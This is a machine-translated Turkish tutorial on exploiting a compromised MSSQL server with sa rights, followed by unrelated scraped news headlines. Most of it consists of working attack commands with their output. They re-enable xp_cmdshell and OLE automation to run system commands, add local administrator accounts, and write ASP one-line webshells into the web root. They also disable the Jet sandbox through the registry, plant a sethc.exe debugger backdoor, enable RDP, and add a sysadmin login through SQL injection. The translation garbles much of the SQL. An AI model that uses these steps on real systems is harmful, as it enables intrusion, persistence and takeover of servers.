Sızma testinde MSSQL hizmetinin kullanımını açıklayın

Önsöz:

En pratik güvenlik açığı istismar sürecini yeniden üretme taahhüdü.

Bu makale aşağıdakileri öğrenmenize yardımcı olacaktır:

  • "Xp_cmdshell" genişletilmiş saklı yordamları kullanmayı öğrenin
  • "Wscript.shell" i çağırmayı öğrenin
  • Dosya yazmak için MSSQL öğrenin
  • Hakları artırmak için kum masası modunu öğrenme
  • Kayıt defteri görüntüsünün ele geçirilmesini ve iletilmesini öğrenme

part1 Depolanan yordamı genişletmek için `xp_cmdshell` kullanın

Adım 1 MSSQL hizmetine bağlanın

Öncelikle SQL sorgu çözümleyicisini açın ve ilgili parametreleri aşağıdaki gibi doldurun (burada veritabanı ile ilgili bilgilerin önceki sızma testi ile elde edildiği varsayılır.

İlgili parametreleri tamamladıktan sonra, sunucunun MSSQL sorgu analiz sayfasına girmek için 'Tamam'a tıklayın.

Karşı tarafın MSSQL hizmetinde oturum açtıktan sonra, SQL Query Analyzer'ın arayüzünü aşağıdaki gibi görüyoruz, lütfen Query Analyzer'ın işlev sayfasını anlamak için simgeye bakın:

Soldaki nesne tarayıcısı görünmezse, nesne tarayıcısını açmak için lütfen yukarıda gösterildiği gibi sağ üst köşedeki kırmızı çerçeveye tıklayın.

Sorgu kutusu, yürütülecek SQL ifadesini girmek için kullanılır.

Örneğin, veritabanı bilgilerini ve sistem sürümünü görüntülemek için sorgu kutusuna aşağıdaki cümleyi giriyoruz:

@@ sürümünü seç

Sorguyu sonlandırmak veya birden çok cümleyi birleştirmek için MSSQL ifadesinin ardından ``; `kullanılabilir. Ardından "-" gereksiz ifadeleri yorumlama amacına ulaşabilir.

Varsayılan olarak, görüntülediğimiz sonuçlar tam değil, tablo görünümü yöntemidir.SQL sorgusunun geri dönüşünü daha net görmek için, 'sorgu`ya tıklıyoruz. > `Metin görüntüleme sonuçları` ve ardından SQL ifadesini yürütün:

Bu noktada, tam sorgu sonucunu görebilirsiniz:

Microsoft SQL Server 2005-9.00.1399.06 (Intel X86)

14 Ekim 200500:33:37

Telif Hakkı (c) 1988-2005 Microsoft Corporation

Windows NT 5.2 üzerinde Enterprise Edition (Derleme 3790: Service Pack 2)

(Etkilenen satır sayısı 1 satırdır)

MSSQL sürümü: `Microsoft SQL Server 2005`

Sunucu sürümü: `Windows NT 5.2 (windows2003) '

Adım 2 İzinleri doğrulayın ve çalıştırmayı deneyin

Karşı tarafın MSSQL hizmetinin "SA" yetkisine sahip olup olmadığını tespit etmek için aşağıdaki SQL ifadesini kullanırız ("sa" yetkisine sahip MSSQL kullanıcıları genellikle sistemin "sistem" yetkisine karşılık gelir):

IS_SRVROLEMEMBER ('sysadmin') seçin

Sorgu sonucu "1" döndürürse, bunun "SA" otoritesi olduğu anlamına gelir. Neyse ki, hedef makinemizin "MSSQL" hesabı "SA" ya karşılık gelir

İzinler.

Hedef makinenin MSSQL hizmetinde bir "xp_cmdshell" genişletilmiş saklı yordamı olup olmadığını belirlemek için aşağıdaki SQL ifadesini kullanın:

xtype = 'x' ve name = 'xp_cmdshell' olmak üzere master.dbo.sys nesnelerinden count (*) seçin;

Döndürülen sonuç "0" olmadığı sürece bu, "xp_cmdshell" genişletilmiş saklı yordam olduğu anlamına gelir. Etkin olup olmadığına karar vereceğiz:

Yukarıdaki gibi, sorgu "1" döndürür, yani bir "xp_cmdshell" genişletilmiş saklı yordamı vardır, ardından "whoami" sistem komutunu yürütmek için "xp_cmdshell" genişletilmiş saklı yordamı kullanarak aşağıdaki SQL ifadesini çalıştırmaya çalışırız (mevcut sistem izinlerini kontrol edin):

Exec master..xp_cmdshell'whoami ';

Komut başarıyla yürütülemedi ve aşağıdaki hata mesajı alındı.

Hata Mesajı: SQL Server, bileşen 'xp_cmdshell' yordamınınys.xp_cmdshell'ine erişimi engelledi çünkü bu bileşen bu sunucunun güvenlik yapılandırmasının bir parçası olarak kapatıldı. Sistem yöneticisi sp_configure kullanarak 'xp_cmdshell'i etkinleştirebilir. 'Xp_cmdshell'i etkinleştirme hakkında daha fazla bilgi için SQL Server Books Online'da "Surface Configurator" konusuna bakın.

Adım 3 Genişletilmiş depolama sürecini onarın

Neyse ki, hata mesajından "xp_cmdshell" genişletilmiş saklı yordamın silinmediği, ancak erişimin yasak olduğu sonucuna varabiliriz. Böylece SQL ifadeleri aracılığıyla etkinleştirebiliriz.

(Birden fazla cümle desteklenmiyorsa, lütfen her cümleyi ayrı ayrı noktalı virgülle yürütün):

EXEC sp_configure'ın gelişmiş seçenekleri göster ', 1; RECONFIGURE; EXEC sp_configure'xp_cmdshell', 1; RECONFIGURE;

Yukarıdaki SQL ifadesinin yürütülmesi aşağıdaki gibi döner:

Yapılandırma seçeneği 'ne kadar gelişmiş seçenekler' 0'dan 1'e değiştirildi. Lütfen yüklemek için RECONFIGURE ifadesini çalıştırın.

Yapılandırma seçeneği 'xp_cmdshell' 0'dan 1'e değiştirildi. Lütfen yüklemek için RECONFIGURE ifadesini çalıştırın.

SQL sorgusu yukarıdaki gibi dönerse, bu, "xp_cmdshell" genişletilmiş saklı yordamın başarıyla etkinleştirildiği anlamına gelir.

Etkinleştirdikten sonra, "xp_cmdshell" genişletilmiş saklı yordamı kullanarak sistem komutlarını yürütmek için aşağıdaki SQL ifadesini kullanırız:

Exec master..xp_cmdshell'whoami ';

İfade yürütme aşağıdaki gibi yankılanır:

çıktı

---------

nt otorite \ sistem

BOŞ

(Etkilenen satır sayısı 2 satırdır)

Yukarıdaki gibi bir yankı elde etmeyi başardık ve mevcut kullanıcı yetkisinin "SİSTEM" olduğunu öğrendik.

Elbette, Windows hesabı işlemlerini de gerçekleştirebilirsiniz:

Exec master..xp_cmdshell'net kullanıcısı ';

> Sistemin mevcut kullanıcı durumunu görüntülemek için `net user` komutu

Adım 4 Takip süreci

`Xp_cmdshell` genişletilmiş saklı yordamı silinirse, aşağıdaki ifadeyi kullanarak bunu yeniden ekleyebilirsiniz:

EXEC sp_addextendedproc xp_cmdshell, @ dllname = 'xplog70.dll'declare @o int;

sp_addextendedproc'xp_cmdshell ',' xpsql70.dll ';

"Xp_cmdshell" saklı yordamını kaldırmak için aşağıdaki ifadeyi kullanın:

EXEC sp_configure'un gelişmiş seçenekleri göster ', 1; RECONFIGURE; EXEC sp_configure'xp_cmdshell', 0; RECONFIGURE;

Aşağıdaki dönüşü alın:

Yapılandırma seçeneği 'ne kadar gelişmiş seçenekler' 1'den 1'e değiştirildi. Lütfen yüklemek için RECONFIGURE ifadesini çalıştırın.

Yapılandırma seçeneği 'xp_cmdshell' 1'den 0'a değiştirildi. Lütfen yüklemek için RECONFIGURE ifadesini çalıştırın.

Devre dışı bıraktıktan sonra, komutu çalıştırmak için "xp_cmdshell" genişletilmiş saklı yordamını kullanmaya çalışıyoruz:

Exec master..xp_cmdshell'whoami ';

"Xp_cmdshell" genişletilmiş saklı yordamını tamamen silmek istiyorsanız, doğrudan C sürücüsünde "xplog70.dll" araması yapmanız ve ardından silmeniz önerilir.

part2 "wscript.shell" i çağırır

Adım 1 "sys.sp_OACreate" i geri yükleyin

"Xp_cmdshell" genişletilmiş saklı yordamı silindiğinde veya kullanılamadığında, sistem komutlarını yürütmek için "wscript.shell" sistemini çağırmak için "SP_OACreate" ve "SP_OAMETHOD" kullanmayı deneyebiliriz.

@ Runshell INT; Exec SP_OACreate'wscript.shell ', @ runshell out; Exec SP_OAMeTHOD @ runshell,' run ', null,' net user admin 123456 / add ';

Aşağıda görebileceğiniz gibi, varsayılan mümkün değildir, aşağıdaki hata mesajları vardır:

SQL Server, "Ole Otomasyon Prosedürleri" bileşeninin "sys.sp_OACreate" prosedürüne erişimi engelledi çünkü bu bileşen, bu sunucunun güvenlik yapılandırmasının bir parçası olarak kapatıldı

Bir "OLE Otomasyon" nesnesinin bir "Transact-SQL" toplu işleminde somutlaştırılıp başlatılamayacağını belirtmek için "Otomasyon Prosedürleri" seçeneğini kullanın. Bu seçeneği yapılandırmak için ilke tabanlı yönetimi veya "sp_configure" saklı yordamını da kullanabilirsiniz. Daha fazla bilgi için bkz. Yüzey Alanı Yapılandırıcısı.

Ole Otomasyon Prosedürleri seçeneğini aşağıdaki değerlere ayarlayabilirsiniz:

> `0`: OLE Otomasyon Prosedürlerini devre dışı bırakın. Yeni bir SQL Server örneği için varsayılan değer.

> `1`: OLE Otomasyon Prosedürlerini etkinleştirin.

"OLE Otomasyon Prosedürleri" etkinleştirildiğinde, "sp_OACreate" çağrısı "OLE" paylaşılan yürütme ortamını başlatır.

"Otomasyon Prosedürleri" seçeneğinin geçerli değerini görüntülemek ve değiştirmek için "sp_configure" sistem saklı yordamını kullanabilirsiniz.

`OLE Otomasyon Prosedürlerinin geçerli ayarlarını görüntülemek için aşağıdaki SQL ifadesini yürütün:

EXEC sp_configure'Ole Otomasyon Prosedürleri ';

Aşağıdaki bilgiler varsayılan olarak döndürülür

minimum maksimum yapılandırma_değer run_value

------- --------- ------------ ---------

01 00

Yukarıdaki gibi, "config_value" ve "run_value" değerlerinin her ikisi de 0'dır, yani devre dışı bırakılmıştır.

`OLE Otomasyon Prosedürlerini etkinleştirmek için aşağıdaki SQL ifadesini yürütün:

exec sp_configure'show advanced options ', 1; RECONFIGURE; exec sp_configure'Ole Automation Procedures', 1; RECONFIGURE;

Yapılandırma seçeneği 'ne kadar gelişmiş seçenekler' 0'dan 1'e değiştirildi. Lütfen yüklemek için RECONFIGURE ifadesini çalıştırın.

Yapılandırma seçeneği 'Ole Otomasyon Prosedürleri' 0'dan 1'e değiştirildi. Lütfen yüklemek için RECONFIGURE ifadesini çalıştırın.

Adım 2 `sys.sp_OACreate` kullanın

Sistem komutlarını yürütmek için "wscript.shell" sistemini çağırmak için "SP_OACreate" ve "SP_OAMETHOD" kullanarak tekrar deneyin.

@ Runshell INT; Exec SP_OACreate'wscript.shell ', @ runshell out; Exec SP_OAMeTHOD @ runshell,' run ', null,' net user admin 123456 / add ';

Aşağıdaki şekilde gösterildiği gibi, herhangi bir hata bildirilmedi ve sorgu başarıyla yürütüldü, ancak CMD komutunun yanıtı görülmedi:

Ardından, hesabın başarıyla eklenip eklenmediğini doğrulamak için "xp_cmdshell" kullanmayı deneyebiliriz:

`Xp_cmdshell` genişletilmiş saklı yordamı yoksa, önce geri yüklemek için aşağıdaki ifadeyi kullanın:

EXEC sp_configure'ın gelişmiş seçenekleri göster ', 1; RECONFIGURE; EXEC sp_configure'xp_cmdshell', 1; RECONFIGURE;

Ardından, yönetici hesabını eklemek için sistem komutunun "wscript.shell" sistemini "SP_OACreate" ve "SP_OAMETHOD" ile çağırarak yürütüldüğünü doğrulamak için aşağıdaki ifadeyi yürütün:

Exec master..xp_cmdshell'net kullanıcı yöneticisi ';

Yukarıdaki şekilde görüldüğü gibi bir admin hesabı var ve kullanım başarılı.

part3 MSSQL yazma dosyası

Adım 1 sp_makewebtask dosya yazma

'SA` izni nedeniyle, hedef sunucu bir web sunucusu ise yedeklememize gerek yoktur.Tek gönderilmiş bir Truva atı yazıp web dizinine gidebilirsiniz.

Web dizinini bilmeden, dizini listelemek için aşağıdaki SQL ifadesini kullanabiliriz:

exec master.dbo.xp_subdirs'c: \ www \ ';

`Sp_makewebtask` genişletilmiş saklı yordamı dizindeki dosyaları değil, yalnızca dizini listeler.

"C: \ www \" nin mevcut web dizini olduğunu varsayarsak, dizine "testwr.asp" adlı bir dosya yazmak için aşağıdaki ifadeyi kullanmaya çalışırız. Dosyanın içeriği ASP tipi bir Truva atıdır:

exec sp_makewebtask'c: \ www \ testwr.asp ',' seçin '' < % yürütme (istek ("SB"))% > '' '

Yukarıdaki şekilde görülebileceği gibi, dosya başarıyla yazılamadı ve aşağıdaki hata ortaya çıktı:

Sunucu: Mesaj 15281, Seviye 16, Durum 1, Prosedür xp_makewebtask, satır 1

SQL Server, 'Web Yardımcısı Prosedürleri' bileşeninin prosedür'sys.xp_makewebtask'ına erişimi engelledi çünkü bu bileşen, bu sunucunun güvenlik yapılandırmasının bir parçası olarak kapatıldı. Sistem yöneticisi sp_configure kullanarak 'Web Yardımcısı Prosedürleri'ni etkinleştirebilir. "Web Yardımcısı Prosedürleri" ni etkinleştirme hakkında daha fazla bilgi için SQL Server Books Online'da "Surface Configurator" konusuna bakın.

Yukarıdaki hata mesajına göre, aslında devre dışı bırakılan "xp_makewebtask" genişletilmiş saklı yordamıdır, bu nedenle "xp_makewebtask" genişletilmiş saklı yordamı geri yüklemek için aşağıdaki SQL ifadesini kullanabiliriz:

exec sp_configure 'Web Yardımcısı Prosedürleri', 1; YENİDEN YAPILANDIR

Aşağıdaki bilgiler döndürülür:

Yapılandırma seçeneği 'Web Yardımcısı Prosedürleri' 0'dan 1'e değiştirildi. Lütfen yüklemek için RECONFIGURE ifadesini çalıştırın.

Yukarıdaki SQL çalıştırması geri döndüğünde, komutun başarıyla yürütüldüğünü sorar, etkisine bakalım:

SQL ifadesini çalıştırarak dosyayı yazmaya çalışın:

exec sp_makewebtask'c: \ www \ testwri.asp ',' seçin '' < % yürütme (istek ("SB"))% > '' '

Yukarıdaki, komutun başarılı bir şekilde yürütüldüğünü gösterir.

Dolayısıyla, dosyanın başarılı bir şekilde yazılmış olup olmadığına bakılmaksızın, "xp_cmdshell" genişletilmiş saklı yordamı aracılığıyla "type" komutunu yürüterek dosyanın içeriğini doğrulayabiliriz:

exec master..xp_cmdshell'type c: \ www \ testwri.asp '

Yukarıdaki şekilde gösterilen uygulama yankısı, Truva atının kodunun tek bir cümleyle yazıldığını gösterir, ancak bazı karışık şeyler de vardır:

< TR > < TH ALIGN = SOL > n / a < / TH > < / TR >

< TR > < TD > < TT > < % yürütme (istek ("SB"))% > < / TT > < / TD > < / TR >

< / TABLO >

(Etkilenen satır sayısı 27 satırdır)

Adım 2 xp_cmdshell dosya yazma

Sunucunun "xp_cmdshell" genişletilmiş saklı yordamı mevcutsa, dosyayı doğrudan sistem adlandırmasını yürüterek yazabilirsiniz:

exec master..xp_cmdshell'echo ^ < % eval isteği ("başarılı")% ^ > > c: \ www \ update.asp '-

> Burada "echo" komutu, pencereler için bir dosya komutudur ve "^" sembolü kaçınmak içindir. < , > `Sembolü, sistem komutu meta-komut sembolüyle çakışıyor.

Komut başarıyla yürütüldükten sonra, "c: \ www \ update.asp" dosyası yazılacak ve içerik, ASP türünde tek cümlelik bir Truva atıdır.

Komut yürütüldükten sonra, dosyanın içeriğini aşağıdaki ifade ile doğrulayabiliriz (`type` ifadesi dosya içeriğini yazdırır):

exec master..xp_cmdshell'type c: \ www \ update.asp '-

Yukarıda görüldüğü gibi, tek cümlelik Truva atı kodu dosyaya başarıyla yazılmıştır.

part4 kum tablosu modu yükseltme

Sistem komutlarını yürütmek için `jet.oledb` kullanın

openrowset'ten * seçin ('microsoft.jet.oledb.4.0', '; veritabanı = c: \ windows \ system32 \ ias \ ias.mdb', 'kabuğu seçin ("cmd.exe / c whoami")')

Hata, varsayılan olarak aşağıdaki şekilde rapor edilir:

Sunucu: Mesaj 15281, Seviye 16, Durum 1, Satır 1

SQL Server, 'Ad Hoc Dağıtılmış Sorgular' bileşeninin STATEMENT'OpenRowset / OpenDatasource'a erişimi engelledi çünkü bu bileşen sunucunun güvenlik yapılandırmasının bir parçası olarak kapatıldı. Sistem yöneticisi sp_configure kullanarak 'Ad Hoc Dağıtılmış Sorgular'ı etkinleştirebilir. 'Ad Hoc Dağıtılmış Sorgular'ı etkinleştirme hakkında daha fazla bilgi için SQL Server Books Online'da "Surface Configurator" konusuna bakın.

Ad Hoc Dağıtılmış Sorguları Etkinleştir:

exec sp_configure'show gelişmiş seçenekleri ', 1; yeniden yapılandırın; exec sp_configure' Ad Hoc Dağıtılmış Sorgular ', 1; yeniden yapılandırın

Aşağıdaki iade bilgilerini alın:

Yapılandırma seçeneği 'ne kadar gelişmiş seçenekler' 1'den 1'e değiştirildi. Lütfen yüklemek için RECONFIGURE ifadesini çalıştırın.

'Ad Hoc Dağıtılmış Sorgular' yapılandırma seçeneği 0'dan 1'e değiştirildi. Lütfen yüklemek için RECONFIGURE ifadesini çalıştırın.

Sistem sanal alan modunu kapatmayı deneyin, kayıt defterindeki konumu

`HKEY_LOCAL_MACHINE \ Yazılım \ Microsoft \ Jet \ 4.0 \ Engine \ SandBoxMode`

Varsayılan anahtar değeri "2" dir, yani korumalı alan modu yalnızca "Erişim" modunda etkinleştirilir ve karşılık gelen anahtar değeri

`0`: Herhangi bir sahipte güvenli modu etkinleştirmeyi yasakla

"1": yalnızca izin verilen aralık dahilinde

`2`: Erişim modunda olmalıdır

`3`: tamamen açık

SQL deyimleriyle elde edilen sistem korumalı alan modunu kapatmak için 0 olarak ayarlamamız gerekir.

exec master..xp_regwrite'HKEY_LOCAL_MACHINE ',' SOFTWARE \ Microsoft \ Jet \ 4.0 \ Engines ',' SandBoxMode ',' REG_DWORD ', 0

Ardından, whoami sistem komutunu çalıştırmak için `jet.oledb` kullanın:

openrowset'ten * seçin ('microsoft.jet.oledb.4.0', '; veritabanı = c: \ windows \ system32 \ ias \ ias.mdb', 'kabuğu seçin ("cmd.exe / c whoami")')

Expr1000

---------------------

2296.0

(Etkilenen satır sayısı 1 satırdır)

Ardından sistem komutunu çalıştırmayı deneyin:

openrowset'den * seçin ('microsoft.jet.oledb.4.0', '; veritabanı = c: \ windows \ system32 \ ias \ ias.mdb', 'kabuk seçin ("cmd.exe / c net kullanıcı testi 123456 / ekle" ) ')

Burada sistem komutu çalıştırıldığında yankı olmaz, hesabın şu şekilde eklenip eklenmediğini kontrol ederiz:

exec master..xp_cmdshell'net kullanıcı testi '-

Kum masası modunu aşağıdaki gibi geri yükleyin:

exec master..xp_regwrite'HKEY_LOCAL_MACHINE ',' SOFTWARE \ Microsoft \ Jet \ 4.0 \ Engines ',' SandBoxMode ',' REG_DWORD ', 2

Yukarıdaki komutu tekrar yürütmek başarısız olur:

exec master..xp_cmdshell'net kullanıcı testi '-

Part5 kayıt defteri görüntüsünün ele geçirilmesi ve yükseltilmesi

İlk olarak, kayıt defterini yazma saklı yordamını geri yükleyin:

exec sp_addextendedproc xp_regwrite, 'xpstar.dll'

Bu genellikle görüntü ele geçirme için gerçekleştirilir:

exec xp_regwrite'HKEY_LOCAL_MACHINE ',' SOFTWARE \ Microsoft \ WindowsNT \ CurrentVersion \ Image File Execution Options \ sethc.exe ',' debugger ',' REG_SZ ',' c: \ windows \ system32 \ cmd.exe '

Aslında, yukarıdaki ifade çalışmaz, aşağıdaki gibi tamamlandıktan sonra onaltılık kodlamaya ihtiyaç duyar:

exec xp_regwrite 0x484b45595f4c4f43414c5f4d414348494e45,0x534f4654574152455c4d6963726f736f66745c57696e646f7773204e545c43757272656e7456657273696f6e5c496d6167652046696c6520457865637574696f6e204f7074696f6e735c73657468632e657865,0x6465627567676572,0x5245475f535a, 'c: \ Windows \ system32 \ taskmgr.exe' -

Bu kod, ele geçirilecek programın sethc.exe olduğunu gösterir, sethc.exe adlı dosyayı çalıştırdığınız sürece, görev yöneticisi hangi klasörde olursa olsun başlatılacaktır (tabii ki, sethc.exe'yi başlatmak istediğiniz programa doğrudan değiştirebilirsiniz. yol)

3389'u kayıt formu aracılığıyla açın:

exec master..xp_cmdshell "wmic RDTOGGLE WHERE ServerName = '% COMPUTERNAME%' SetAllowTSConnections 1'i çağırın" -

Dönüş aşağıdaki gibidir:

çıktı

-----------------------

WMIC kuruluyor, lütfen bekleyin. Yürütme (\ V5EST0RAB06 \ ROOT \ CIMV2: Win32_TerminalServiceSetting.ServerName = "V5EST0RAB06") - > SetAllowTSConnections ()

Yöntem başarıyla yürütüldü.

Çıkış parametreleri:

__PARAMETERS örneği

{

ReturnValue = 0;

};

BOŞ

BOŞ

(Etkilenen satır sayısı 9 satırdır)

Yukarıdaki gibi geri dönmek başarıdır.

Hedef makineye bağlanın ve 5 kez shift tuşuna basın:

Görev yöneticisi aracılığıyla cmd'yi arayın:

Daha sonra, genişletilmiş saklı yordamı geri yüklediğimizde, "sp_addextendedproc" bulunmazsa, "xplog70.dll" silinmezse "SA" izinleri de doğrudan geri yüklenebilir

"SP_ADDextendedproc" prosedürünün birden fazla cümle dışında yürütülmesi gerekiyor. Enjeksiyon noktaları durumunda, aşağıdaki gibi bir veritabanı kullanıcısı ekleyebilirsiniz:

? id = 1; exec master.dbo.sp_addlogin haco, lovehaco; -

? id = 1; exec master.dbo.sp_addsrvrolemember haco, sysadmin; -

Sorgulayıcıyı çağırın `sp_addextendedproc` kurtarma işlemi aşağıdaki gibidir:

usta kullan

Git

sp_addextendedproc prosedürünü oluştur

@functname nvarchar (517),

@dllname varchar (255)

gibi

implicit_transactions kapalı

if @@ trancount > 0

başla

Raiseerror (15002, -1, -1, 'sp_addextendedproc')

dönüş (1)

son

dbcc addextendedproc (@functname, @dllname)

dönüş (0)

Ardından saklı yordamı geri yükleyin.

sp_addextendedproc xp_cmdshell, @ dllname = xplog70.dll

sonuç olarak:

Teknoloji ve teknik bilgi özetlenmeli ve kaydedilmelidir.

Çin Yeni Yılı boyunca her eve geri döneceğim ve Papi sosunun evliliği ve aşk görüşü netizenleri özlüyor: Sadece sessizce yaşa
önceki
Suning, Asya'ya katılmak için birçok siyah teknolojiyi getiriyor CES akıllı perakende çözümleri yükseltmeye devam ediyor
Sonraki
Netizenlerin yaklaşık% 80'i düğün yapmadan evliliği kabul edebiliyor: çoğunlukla utançtan korkan ebeveynleri için
Ülkenin ilk sigara yakalama sistemi başlatıldı, netizenlerin% 40'ı gizliliğin ihlal ettiğine inanıyor ve% 77'si hala bunu destekliyor
Ayin duygusu çocuklar için ne kadar önemlidir? Ritüel duygusu olmayan çocuklar gelecekte işe yaramayacak
kötü! 2 Adam, teraziye müdahale etmek için uzaktan kumandayı kullandı ve yasadışı olarak yaklaşık 1,2 milyon yuan kazandı
Guangxi, Guangdong, Tibet, Yunnan ... Shenzhen sınır polisi yoksulluğu azaltma yolunda
Bilim ve teknolojide kamuoyu: Operatörler yine hızlandırma ve ücret düşürme "hediyeleri" sunuyor hangisini seçersiniz?
Araba ne kadar çok sürerse, o kadar fazla yakıt tüketir mi? Bu 6 yakıt tasarrufu ipucu aslında "arabaları yok ediyor" ve eski sürücüler genellikle bunları yapıyor
Kuş kimseyi beklemez, acele edin ve izleyin! İlk Nanling Kuş Gözlem Yarışması 2019'da düzenlendi
Zhou Xun tekrar giyinecek ve yaşlanmayı durduramaz Akranı Chen Kun hala genç ve yakışıklı.
Dongguan Dostu İşletme Lijia Ambalaj: Dost işletmelerin inşasını teşvik edin, geleneksel kültürü miras alın ve yenileyin
Kırsal Fujian'daki bu tür yabani ananas sadece el işi yapmakla kalmaz, aynı zamanda soğuk algınlığı ve ateşi tedavi edebilir ve alkol ve zehiri rahatlatabilir.
Aynı sahnede yarışan yüzden fazla çocukla, bu eyalet çocuk sanat çiçek fuarına katılmak için Guangzhou'yu kim temsil edebilir?
To Top